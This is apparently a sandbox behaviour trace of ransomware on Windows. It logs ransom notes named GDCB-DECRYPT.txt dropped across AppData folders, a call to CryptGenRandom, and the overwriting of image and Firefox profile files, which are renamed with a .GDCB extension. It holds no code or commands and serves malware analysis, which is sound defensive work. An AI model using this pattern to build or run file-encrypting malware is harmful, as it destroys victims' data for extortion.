File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\Style\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Credentials\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\XLSTART\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MMC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\PowerPoint\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Proof\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Speech\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\UProof\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Vault\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\AccountPictures\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Libraries\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Network Shortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 1048576, size_out = 75107 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 75120 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg.GDCB False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, size = 1048576, size_out = 768 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, size = 768 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, size = 1048576, size_out = 29 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, size = 32 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\times.json.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, size = 1048576, size_out = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, size = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, size = 1048576, size_out = 819 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, size = 832 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\xulstore.json.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 1048576, size_out = 122 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 128 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 256 True 2
Fn
Data
